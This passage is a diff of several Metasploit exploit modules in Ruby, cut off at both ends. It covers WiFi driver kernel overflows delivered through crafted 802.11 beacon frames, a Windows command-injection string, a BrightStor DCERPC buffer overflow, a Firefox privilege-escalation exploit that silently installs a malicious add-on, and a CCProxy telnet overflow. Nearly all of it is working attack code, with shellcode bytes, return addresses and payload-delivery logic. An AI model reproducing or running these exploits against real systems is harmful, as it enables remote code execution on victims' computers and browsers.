'Johnny Cache <johnnycsh [at] 802.11mercenary.com>', # the man with the plan
|
||||
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>', # the man with the plan
|
||||
'skape', # windows kernel ninjitsu and debugging
|
||||
'hdm' # porting the C version to ruby
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 3583 $',
|
||||
'Version' => '$Revision: 9669 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-5882'],
|
||||
['OSVDB', '30294'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
|
||||
[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
|
||||
{
|
||||
'Ret' => 0x8066662c, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
'Recovery' => 'idlethread_restart',
|
||||
'KiIdleLoopAddress' => 0x804dbb27,
|
||||
|
||||
'KiIdleLoopAddress' => 0x804dbb27,
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
],
|
||||
|
||||
|
||||
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
||||
[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
|
||||
{
|
||||
'Ret' => 0x804f16eb, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
|
@ -83,13 +92,13 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
|||
'KiIdleLoopAddress' => 0x804dc0c7,
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 11 2006'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
||||
|
@ -99,102 +108,99 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
open_wifi
|
||||
|
||||
|
||||
stime = Time.now.to_i
|
||||
|
||||
|
||||
print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")
|
||||
|
||||
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
|
||||
|
||||
|
||||
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
|
||||
|
||||
select(nil, nil, nil, 0.02)
|
||||
wifi.write(create_response)
|
||||
|
||||
select(nil, nil, nil, 0.01)
|
||||
wifi.write(create_beacon)
|
||||
|
||||
|
||||
break if session_created?
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
print_status("Finished sending frames...")
|
||||
end
|
||||
|
||||
|
||||
def create_beacon
|
||||
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
|
||||
dst = eton('FF:FF:FF:FF:FF:FF')
|
||||
seq = [Time.now.to_i % 4096].pack('n')
|
||||
|
||||
|
||||
blob = create_frame
|
||||
blob[0,1] = 0x80.chr
|
||||
blob[4,6] = dst
|
||||
blob[10,6] = src
|
||||
blob[16,6] = src
|
||||
blob[22,2] = seq
|
||||
|
||||
|
||||
blob
|
||||
end
|
||||
|
||||
|
||||
def create_response
|
||||
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
|
||||
dst = eton(datastore['ADDR_DST'])
|
||||
seq = [Time.now.to_i % 256].pack('n')
|
||||
|
||||
|
||||
blob = create_frame
|
||||
blob[0,1] = 0x50.chr
|
||||
blob[0,1] = 0x50.chr
|
||||
blob[4,6] = dst
|
||||
blob[10,6] = src
|
||||
blob[16,6] = src # bssid field, good idea to set to src.
|
||||
blob[16,6] = src # bssid field, good idea to set to src.
|
||||
blob[22,2] = seq
|
||||
|
||||
|
||||
blob
|
||||
end
|
||||
|
||||
def create_frame
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
"\x58\x58\x58\x58\x58\x58" + # src
|
||||
"\x58\x58\x58\x58\x58\x58" + # bssid
|
||||
"\x70\xed" + # sequence number
|
||||
|
||||
|
||||
#
|
||||
# fixed parameters
|
||||
#
|
||||
|
||||
|
||||
# timestamp value
|
||||
Rex::Text.rand_text_alphanumeric(8) +
|
||||
rand_text_alphanumeric(8) +
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x11\x04" + # capability flags
|
||||
|
||||
|
||||
#
|
||||
# tagged parameters
|
||||
#
|
||||
|
||||
|
||||
# ssid tag
|
||||
"\x00" + # tag: SSID parameter set
|
||||
"\x5d" + # len: length is 93 bytes
|
||||
|
||||
|
||||
# jump into the payload
|
||||
"\x89\xf9" + # mov edi, ecx
|
||||
"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
|
||||
"\xff\xe1" + # jmp ecx
|
||||
|
||||
|
||||
# padding
|
||||
Rex::Text.rand_text_alphanumeric(79) +
|
||||
|
||||
rand_text_alphanumeric(79) +
|
||||
|
||||
# return address
|
||||
[target.ret].pack('V') +
|
||||
|
||||
|
||||
# vendor specific tag
|
||||
"\xdd" + # wpa
|
||||
"\xff" + # big as we can make it
|
||||
|
||||
|
||||
# the kernel-mode stager
|
||||
payload.encoded
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
# milw0rm.com [2006-11-13]
|
||||
end
|
||||
|
|
|
@ -1,57 +1,72 @@
|
|||
##
|
||||
# $Id: dlink_wifi_rates.rb 9670 2010-07-03 03:19:07Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = LowRanking
|
||||
|
||||
class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Lorcon
|
||||
include Exploit::KernelMode
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Exploit::KernelMode
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the A5AGU.SYS driver provided
|
||||
with the D-Link DWL-G132 USB wireless adapter. This stack overflow
|
||||
allows remote code execution in kernel mode. The stack overflow is triggered
|
||||
when a 802.11 Beacon frame is received that contains a long Rates information
|
||||
element. This exploit was tested with version 1.0.1.41 of the
|
||||
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
|
||||
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
|
||||
adapter and appear to resolve this flaw, but D-Link does not offer an updated
|
||||
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
|
||||
all cards within range of the attack will be affected. The tested adapter used
|
||||
a MAC address in the range of 00:11:95:f2:XX:XX.
|
||||
|
||||
Vulnerable clients will need to have their card in a non-associated state
|
||||
for this exploit to work. The easiest way to reproduce this bug is by starting
|
||||
the exploit and then accessing the Windows wireless network browser and
|
||||
forcing it to refresh.
|
||||
|
||||
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
|
||||
database indicates that D-Link has not provided an official patch or
|
||||
solution for any of the seven flaws listed at the time of writing:
|
||||
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
|
||||
|
||||
This module depends on the Lorcon library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided
|
||||
with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow
|
||||
allows remote code execution in kernel mode. The stack buffer overflow is triggered
|
||||
when a 802.11 Beacon frame is received that contains a long Rates information
|
||||
element. This exploit was tested with version 1.0.1.41 of the
|
||||
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
|
||||
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
|
||||
adapter and appear to resolve this flaw, but D-Link does not offer an updated
|
||||
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
|
||||
all cards within range of the attack will be affected. The tested adapter used
|
||||
a MAC address in the range of 00:11:95:f2:XX:XX.
|
||||
|
||||
Vulnerable clients will need to have their card in a non-associated state
|
||||
for this exploit to work. The easiest way to reproduce this bug is by starting
|
||||
the exploit and then accessing the Windows wireless network browser and
|
||||
forcing it to refresh.
|
||||
|
||||
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
|
||||
database indicates that D-Link has not provided an official patch or
|
||||
solution for any of the seven flaws listed at the time of writing:
|
||||
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
|
||||
|
||||
As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
|
||||
DWL-G132 driver (v1.21).
|
||||
|
||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
},
|
||||
|
||||
'Authors' =>
|
||||
'Author' =>
|
||||
[
|
||||
'hdm', # discovery, exploit dev
|
||||
'skape', # windows kernel ninjitsu
|
||||
'Johnny Cache <johnnycsh [at] 80211mercenary.net>' # making all of this possible
|
||||
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>' # making all of this possible
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 3583 $',
|
||||
'Version' => '$Revision: 9670 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-6055'],
|
||||
['OSVDB', '30296'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'],
|
||||
['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
||||
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
|
@ -63,7 +78,7 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
'Space' => 1000
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
# Windows XP SP2 with the latest updates
|
||||
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
|
||||
|
@ -71,9 +86,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
{
|
||||
'Ret' => 0x8066662c, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
|
@ -81,18 +96,18 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
'KiIdleLoopAddress' => 0x804dbb27,
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
],
|
||||
|
||||
|
||||
# Windows XP SP2 install media, no patches
|
||||
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
||||
[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
|
||||
{
|
||||
'Ret' => 0x804f16eb, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
|
@ -100,72 +115,73 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
'KiIdleLoopAddress' => 0x804dc0c7,
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 13 2006'))
|
||||
|
||||
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
|
||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
open_wifi
|
||||
|
||||
|
||||
stime = Time.now.to_i
|
||||
rtime = datastore['RUNTIME'].to_i
|
||||
count = 0
|
||||
|
||||
|
||||
print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
|
||||
while (stime + rtime > Time.now.to_i)
|
||||
while (stime + rtime > Time.now.to_i)
|
||||
wifi.write(create_beacon)
|
||||
select(nil, nil, nil, 0.10) if (count % 100 == 0)
|
||||
|
||||
|
||||
count += 1
|
||||
|
||||
|
||||
# Exit if we get a session
|
||||
break if session_created?
|
||||
end
|
||||
|
||||
|
||||
print_status("Completed sending beacons.")
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# The following research was provided by Gil Dabah of ZERT
|
||||
#
|
||||
# The long rates field bug can be triggered three different ways (at least):
|
||||
# 1) Send a single rates IE with valid rates up front and long data
|
||||
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
|
||||
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
|
||||
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
|
||||
#
|
||||
|
||||
def create_beacon
|
||||
|
||||
ssid = Rex::Text.rand_text_alphanumeric(6)
|
||||
bssid = ("\x00" * 2) + Rex::Text.rand_text(4)
|
||||
ssid = rand_text_alphanumeric(6)
|
||||
bssid = ("\x00" * 2) + rand_text(4)
|
||||
src = ("\x90" * 4) + "\xeb\x2b"
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
buff = Rex::Text.rand_text(75)
|
||||
buff = rand_text(75)
|
||||
buff[0, 2] = "\xeb\x49"
|
||||
buff[71, 4] = [target.ret].pack('V')
|
||||
|
||||
|
||||
frame =
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
src + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x00\x05" + # capability flags
|
||||
|
||||
|
||||
# ssid tag
|
||||
"\x00" + ssid.length.chr + ssid +
|
||||
|
||||
|
@ -176,14 +192,11 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
"\x03" + "\x01" + channel.chr +
|
||||
|
||||
# eip was his name-o
|
||||
"\x01" + buff.length.chr + buff +
|
||||
"\x01" + buff.length.chr + buff +
|
||||
|
||||
payload.encoded
|
||||
|
||||
|
||||
return frame
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
# milw0rm.com [2006-11-13]
|
||||
|
|
|
@ -128,9 +128,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# due to the fake activation). But this line also will kill other cscript
|
||||
# legit processes which could be running on the target host. Because of it
|
||||
# the exploit has a Manual ranking
|
||||
command = ""127.0.0.1 && "
|
||||
command << cmd.gsub(/&/, "&")
|
||||
command << " && taskkill /F /IM cscript.exe ""
|
||||
command = ""127.0.0.1 && "
|
||||
command << cmd.gsub(/&/, "&")
|
||||
command << " && taskkill /F /IM cscript.exe ""
|
||||
|
||||
res = send_soap_request("OPCACTIVATE", "omHost", command)
|
||||
|
||||
|
|
|
@ -1,92 +0,0 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
|
||||
r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
|
||||
the buffer and execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '68330'],
|
||||
[ 'URL', 'http://www.metasploit.com/users/mc' ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500,
|
||||
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
|
||||
],
|
||||
'DisclosureDate' => 'Oct 4 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([ Opt::RPORT(6502) ], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
connect
|
||||
|
||||
handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
|
||||
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
|
||||
dcerpc.call(0x2B, request)
|
||||
|
||||
sploit = NDR.long(4)
|
||||
sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
begin
|
||||
dcerpc_call(0x8A, sploit)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
=begin
|
||||
/* opcode: 0x8A, address: 0x100707D0 */
|
||||
|
||||
long sub_100707D0 (
|
||||
[in] handle_t arg_1,
|
||||
[in] long arg_2,
|
||||
[in][ref][string] char * arg_3
|
||||
);
|
||||
=end
|
|
@ -1,116 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Remote::FirefoxAddonGenerator
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
|
||||
'Description' => %q{
|
||||
On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
|
||||
invalid input, would throw an exception that did not have an __exposedProps__
|
||||
property set. By re-setting this property on the exception object's prototype,
|
||||
the chrome-based defineProperty method is made available.
|
||||
|
||||
With the defineProperty method, functions belonging to window and document can be
|
||||
overriden with a function that gets called from chrome-privileged context. From here,
|
||||
another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
|
||||
into the context's private scope. Since the window does not have a chrome:// URL,
|
||||
the insecure parts of Components.classes are not available, so instead the AddonManager
|
||||
API is invoked to silently install a malicious plugin.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Mariusz Mlynski', # discovered CVE-2012-3993
|
||||
'moz_bug_r_a4', # discovered CVE-2013-1710
|
||||
'joev' # metasploit module
|
||||
],
|
||||
'DisclosureDate' => "Aug 6 2013",
|
||||
'References' => [
|
||||
['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15)
|
||||
['OSVDB', '86111'],
|
||||
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
|
||||
['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23)
|
||||
['OSVDB', '96019']
|
||||
],
|
||||
'BrowserRequirements' => {
|
||||
:source => 'script',
|
||||
:ua_name => HttpClients::FF,
|
||||
:ua_ver => lambda { |ver| ver.to_i.between?(5, 15) }
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, request, target_info)
|
||||
if request.uri.match(/\.xpi$/i)
|
||||
print_status("Sending the malicious addon")
|
||||
send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
|
||||
else
|
||||
print_status("Sending HTML")
|
||||
send_response_html(cli, generate_html(target_info))
|
||||
end
|
||||
end
|
||||
|
||||
def generate_html(target_info)
|
||||
injection = if target_info[:ua_ver].to_i == 15
|
||||
"Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
|
||||
else
|
||||
"p2.constructor.defineProperty(obj,key,{get:runme});"
|
||||
end
|
||||
|
||||
%Q|
|
||||
<html>
|
||||
<body>
|
||||
#{datastore['CONTENT']}
|
||||
<div id='payload' style='display:none'>
|
||||
if (!window.done){
|
||||
window.AddonManager.getInstallForURL(
|
||||
'#{get_module_uri}/addon.xpi',
|
||||
function(install) { install.install() },
|
||||
'application/x-xpinstall'
|
||||
);
|
||||
window.done = true;
|
||||
}
|
||||
</div>
|
||||
<script>
|
||||
try{InstallTrigger.install(0)}catch(e){p=e;};
|
||||
var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
|
||||
p2.__exposedProps__={
|
||||
constructor:'rw',
|
||||
prototype:'rw',
|
||||
defineProperty:'rw',
|
||||
__exposedProps__:'rw'
|
||||
};
|
||||
var s = document.querySelector('#payload').innerHTML;
|
||||
var q = false;
|
||||
var register = function(obj,key) {
|
||||
var runme = function(){
|
||||
if (q) return;
|
||||
q = true;
|
||||
window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
|
||||
};
|
||||
try {
|
||||
#{injection}
|
||||
} catch (e) {}
|
||||
};
|
||||
for (var i in window) register(window, i);
|
||||
for (var i in document) register(document, i);
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
end
|
||||
end
|
|
@ -1,110 +1,82 @@
|
|||
##
|
||||
# $Id$
|
||||
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service.
|
||||
The stack is overwritten when sending an overly long address to the 'ping' command.
|
||||
This module exploits the YoungZSoft CCProxy <= v6.2 suite
|
||||
Telnet service. The stack is overwritten when sending an overly
|
||||
long address to the 'ping' command.
|
||||
},
|
||||
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision: 9179 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'BID', '11666 ' ],
|
||||
[ 'CVE', '2004-2416' ],
|
||||
[ 'MIL', '621' ],
|
||||
[ 'OSVDB', '11593' ],
|
||||
],
|
||||
[
|
||||
[ 'CVE', '2004-2416' ],
|
||||
[ 'OSVDB', '11593' ],
|
||||
[ 'BID', '11666 ' ],
|
||||
[ 'URL', 'http://milw0rm.com/exploits/621' ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
{
|
||||
'Space' => 1012,
|
||||
'BadChars' => "\x00\x07\x08\x0a\x0d",
|
||||
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
|
||||
},
|
||||
'Platform' => ['win'],
|
||||
'Targets' =>
|
||||
[
|
||||
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
|
||||
[
|
||||
'Windows 2000 Pro All - English',
|
||||
{
|
||||
'Ret' => 0x75023411, # call esi ws2help.dll
|
||||
}
|
||||
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
|
||||
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
|
||||
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
|
||||
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
|
||||
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
|
||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
|
||||
],
|
||||
[
|
||||
'Windows 2000 Pro All - Italian',
|
||||
{
|
||||
'Ret' => 0x74fd2b81, # call esi ws2help.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows 2000 Pro All - French',
|
||||
{
|
||||
'Ret' => 0x74fa2b22, # call esi ws2help.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows XP SP0/1 - English',
|
||||
{
|
||||
'Ret' => 0x71aa1a97, # call esi ws2help.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows XP SP2 - English',
|
||||
{
|
||||
'Ret' => 0x71aa1b22, # call esi ws2help.dll
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 11 2004'))
|
||||
|
||||
register_options(
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(23),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check
|
||||
def check
|
||||
connect
|
||||
banner = sock.get_once(-1,3)
|
||||
disconnect
|
||||
|
||||
if (banner =~ /CCProxy Telnet Service Ready/)
|
||||
return Exploit::CheckCode::Appears
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
||||
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
|
||||
